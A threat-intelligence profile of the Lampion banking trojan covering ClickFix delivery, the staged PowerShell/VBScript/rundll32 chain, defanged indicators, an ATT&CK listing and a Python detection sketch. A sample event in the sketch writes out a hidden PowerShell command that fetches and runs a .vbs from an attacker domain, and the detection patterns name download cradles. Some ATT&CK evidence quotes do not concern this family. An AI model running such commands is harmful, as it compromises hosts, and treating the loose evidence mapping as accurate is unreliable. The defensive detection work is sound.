
Lampion

Lampion is a banking trojan and infostealer focused on sensitive banking information. According to the reporting summarized here, it has been active since at least 2019 and has been heavily associated with Portuguese-language and Portuguese-targeted campaigns, including activity against organizations in government, finance, and transportation. It has also been described as targeting Latin American users, and Cofense notes that the Lampion banking trojan was almost exclusively observed in Portuguese-language campaigns.

Observed delivery vectors include phishing emails with ZIP attachments, HTML files inside archives, SEO poisoning, compromised websites, and ClickFix-style social engineering. In the documented 2025 campaigns, victims were redirected to fake Portuguese tax authority-themed pages and tricked into copying and executing malicious PowerShell commands via the Windows Run dialog under the guise of fixing a problem or enabling file preview.

The infection chain described by Microsoft and Unit 42 is multi-stage and heavily obfuscated. PowerShell downloads obfuscated VBScript (.vbs) stages; execution is split across non-consecutive processes and hidden scheduled tasks to hinder detection and process-tree correlation. Later stages perform reconnaissance and evasion, including WMI checks for security products and sandbox/VM detection, gather endpoint data, generate a victim identifier, communicate with cloud-hosted C2 infrastructure, and use rundll32.exe to launch a large DLL loader. Unit 42 reported stage-3 scripts of roughly 30-50 MB padded with junk code and a stage-4 DLL loader exceeding 700 MB. In the observed campaign, the final Lampion payload was never actually delivered because the payload download command was commented out.

Unit 42 attributed a focused campaign against dozens of Portuguese organizations to Lampion operators based on shared infrastructure, including reuse of a C2 server used in prior Lampion infections. Microsoft reported the campaign was active in May-June 2025 and later expanded beyond Portugal to organizations in Switzerland, Luxembourg, France, Hungary, and Mexico across government, education, transportation, and financial services sectors.

High-confidence infrastructure and IOC details from the source reporting include the domains autoridade-tributaria[.]com and inde-faturas[.]com, the C2 IPs 5.8.9[.]77 and 83.242.96[.]159, and cloud-hosted URLs such as http://18.116.63[.]61/ifeellike.php and http://3.135.249[.]199/prayfor.php.
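As an added example (not code from Mallory, Microsoft, or Unit 42), the Python sketch below turns the chain and indicators described above into a small detection pass over constructed, Sysmon-style process-creation and network events: it refangs the published IOCs, tags each stage of the ClickFix-to-rundll32 chain with its ATT&CK technique, and summarises how many distinct stages a host exhibited. The event schema, file paths, user and task names, and the Temp/Startup path fragments in the patterns are assumptions made for illustration.

```python
"""Detection sketch for the ClickFix-to-Lampion delivery chain summarised above.
Added example, not vendor code. Events are constructed, simplified Sysmon-style
records; every path, host name and task name in them is assumed."""
import re
from urllib.parse import urlparse

# Indicators quoted in the write-up, kept in the defanged form they were published in.
DEFANGED_IOCS = [
    "autoridade-tributaria[.]com",
    "inde-faturas[.]com",
    "5.8.9[.]77",
    "83.242.96[.]159",
    "http://18.116.63[.]61/ifeellike.php",
    "http://3.135.249[.]199/prayfor.php",
]


def refang(ioc):
    """Reverse common defanging so an indicator can be compared against telemetry."""
    return ioc.replace("[.]", ".").replace("hxxps://", "https://").replace("hxxp://", "http://")


def ioc_hosts(defanged):
    """Reduce each indicator to the host (IP or domain) a network event would carry."""
    hosts = set()
    for ioc in defanged:
        value = refang(ioc)
        if "://" in value:
            value = urlparse(value).hostname or value
        hosts.add(value.lower())
    return hosts


IOC_HOSTS = ioc_hosts(DEFANGED_IOCS)

# Behavioural patterns per stage. Path fragments are assumptions chosen to fit the
# chain as described (Temp-resident .vbs, Startup-folder .cmd), not sample strings.
CRADLE = re.compile(r"\b(iwr|irm|iex|Invoke-WebRequest|Invoke-RestMethod|Invoke-Expression)\b", re.I)
TEMP_VBS = re.compile(r'\\Temp\\[^\s"]+\.vbs\b', re.I)
STARTUP_CMD = re.compile(r'\\Startup\\[^\s"]+\.cmd\b', re.I)
TASK_CREATE = re.compile(r"schtasks(\.exe)?\s+/create\b", re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify_event(ev):
    """Return ATT&CK-tagged findings for one event; an empty list means nothing suspicious."""
    findings = []
    if ev["type"] == "network":
        host = ev["dest"].lower()
        if host in IOC_HOSTS:
            findings.append(f"T1071.001 connection to published Lampion infrastructure {host}")
        return findings
    image, parent, cmd = _basename(ev["image"]), _basename(ev["parent"]), ev["cmdline"]
    # Stage 1: Run-dialog ClickFix lure -> PowerShell download cradle under explorer.exe
    if image in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe" and CRADLE.search(cmd):
        findings.append("T1204/T1059.001 PowerShell download cradle launched from explorer.exe")
    # Stage 2: script host running a .vbs dropped in the user's Temp directory
    if image in {"wscript.exe", "cscript.exe"} and TEMP_VBS.search(cmd):
        findings.append("T1059.005 script host executing a .vbs from the Temp directory")
    # Stage 2b: a scheduled task registered to run a later .vbs stage
    if TASK_CREATE.search(cmd) and re.search(r"\.vbs\b", cmd, re.I):
        findings.append("T1053.005 scheduled task created to run a .vbs stage")
    # Stage 3: .cmd placed in the Startup folder and run after the forced reboot
    if image == "cmd.exe" and STARTUP_CMD.search(cmd):
        findings.append("T1547.001 .cmd executed from the Startup folder")
    # Stage 4: rundll32.exe loading the DLL loader from that .cmd
    if image == "rundll32.exe" and parent == "cmd.exe":
        findings.append("T1218.011 rundll32.exe spawned by cmd.exe to load a DLL")
    return findings


def analyze(events):
    """Classify every event and summarise which distinct chain stages were observed."""
    findings = [f for ev in events for f in classify_event(ev)]
    stages = sorted({f.split(" ", 1)[0] for f in findings})
    return {"findings": findings, "stages": stages, "stage_count": len(stages)}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed; the last entry is benign admin noise
    {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r'powershell -w hidden -c "iwr http://inde-faturas.com/preview -OutFile $env:TEMP\s1.vbs; wscript $env:TEMP\s1.vbs"'},
    {"type": "network", "dest": "inde-faturas.com"},
    {"type": "process", "parent": PS, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript C:\Users\alice\AppData\Local\Temp\s1.vbs"},
    {"type": "process", "parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc once /st 13:30 /tn Updater /tr "wscript C:\Users\alice\AppData\Local\Temp\s2.vbs"'},
    {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOST01.cmd"'},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\ld.dll,Start"},
    {"type": "network", "dest": "18.116.63.61"},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": r"powershell -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for line in analyze(SAMPLE_EVENTS)["findings"]:
        print(line)
```

Each rule is deliberately narrow (image plus parent plus command-line shape) so a single hit is a lead rather than an alert; the `stage_count` is what turns several weak signals on one host into a strong one, which matters here precisely because the chain is split across non-consecutive processes and scheduled tasks to defeat parent-child correlation.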

MITRE ATT&CK

Techniques & procedures

18 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

1 technique
T1608.006 SEO Poisoning (evidence: 1)

A combined 35% of social engineering cases involved less conventional methods, including SEO poisoning and malvertising, smishing and MFA bombing.

Initial Access

2 techniques
T1189 Drive-by Compromise (evidence: 1)

One example is ClickFix, a technique using fake browser alerts, fraudulent update prompts and drive-by downloads to initiate compromise.

T1566 Phishing (evidence: 2)

Phishing accounted for 23% of all intrusions and that number remains constant for the data set used in this report. When isolating only social engineering-driven intrusions, phishing rises to 65% of those cases.

Execution

5 techniques
T1053.005 Scheduled Task (evidence: 1)

The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.

T1059.001 PowerShell (evidence: 1)

The ClickFix lure tricks users into launching a PowerShell command that downloads an obfuscated VBScript (.vbs)... PowerShell continues to be the most leveraged native binary, with cmdlets such as iwr (Invoke-WebRequest), irm (Invoke-RestMethod), and iex (Invoke-Expression) being very prolific.

T1059.003 Windows Command Shell (evidence: 1)

The third script also creates a .cmd file in the Windows startup folder, naming it after the user’s hostname, and schedules a system restart. After the device restarts, the .cmd file launches a large DLL through rundll32.exe and attempts to deliver the final payload.

T1059.005 Visual Basic (evidence: 1)

The ClickFix lure tricks users into launching a PowerShell command that downloads an obfuscated VBScript (.vbs). The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.

T1204 User Execution (evidence: 1)

The ClickFix technique attempts to trick users into running malicious commands on their devices... It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell.

Persistence

2 techniques
T1053.005 Scheduled Task (evidence: 1)

The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.

T1547.001 Registry Run Keys / Startup Folder (evidence: 1)

The third script also creates a .cmd file in the Windows startup folder, naming it after the user’s hostname, and schedules a system restart.

Privilege Escalation

2 techniques
T1053.005 Scheduled Task (evidence: 1)

The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.

T1547.001 Registry Run Keys / Startup Folder (evidence: 1)

The third script also creates a .cmd file in the Windows startup folder, naming it after the user’s hostname, and schedules a system restart.

Stealth

4 techniques
T1027 Obfuscated Files or Information (evidence: 1)

Threat actors obfuscate the JavaScript that generates the visual lures or they download parts of the code from different servers. They also employ various tactics in obfuscating malicious commands... These techniques include nested execution chains, proxy command abuse, encoding schemes such as Base64, use of string concatenation/fragmentation, and escaped characters.

T1218 System Binary Proxy Execution (evidence: 1)

“Final payloads are often ‘fileless’… launched in memory by living-off-the-land binaries (LOLBins)… code injected into LOLBins, such as msbuild.exe, regasm.exe, or powershell.exe… signs pointing to LOLBins—such as powershell, mshta, rundll32, wscript…”

T1218.011 Rundll32 (evidence: 1)

After the device restarts, the .cmd file launches a large DLL through rundll32.exe and attempts to deliver the final payload.

T1497 Virtualization/Sandbox Evasion (evidence: 1)

This second .vbs file downloads a third and much larger .vbs file that performs reconnaissance, checks for antivirus or sandbox environments, and sends system data to a command-and-control (C2) server.

Discovery

2 techniques
T1082 System Information Discovery (evidence: 1)

This second .vbs file downloads a third and much larger .vbs file that performs reconnaissance... and sends system data to a command-and-control (C2) server.

T1497 Virtualization/Sandbox Evasion (evidence: 1)

This second .vbs file downloads a third and much larger .vbs file that performs reconnaissance, checks for antivirus or sandbox environments, and sends system data to a command-and-control (C2) server.

Command and Control

3 techniques
T1071 Application Layer Protocol (evidence: 2)

The infrastructure commonly supports ransomware command and control (C2) servers, malware distribution, phishing campaigns, botnet management, and data exfiltration staging.

T1071.001 Web Protocols (evidence: 1)

This second .vbs file downloads a third and much larger .vbs file that performs reconnaissance, checks for antivirus or sandbox environments, and sends system data to a command-and-control (C2) server.

T1105 Ingress Tool Transfer (evidence: 2)

CTU researchers investigated the potential scale of malicious use of these devices and identified multiple internet-exposed systems associated with cybercriminal activity, including ransomware operations and commodity malware delivery.

Exfiltration

1 technique
T1041 Exfiltration Over C2 Channel (evidence: 1)

These payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.

INDICATORS OF COMPROMISE

IOCs tracked for this family

6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network
5 tracked

IPs, domains, and DNS infrastructure linked to this family.

Other
1 tracked

Other indicator types observed in public reporting.

Type     Value     Latest sighting
ip.v4    (masked)  10 months ago
ip.v4    (masked)  10 months ago
ip.v4    (masked)  10 months ago
ip.v4    (masked)  10 months ago
ip.v4    (masked)  10 months ago
uri      (masked)  6 years ago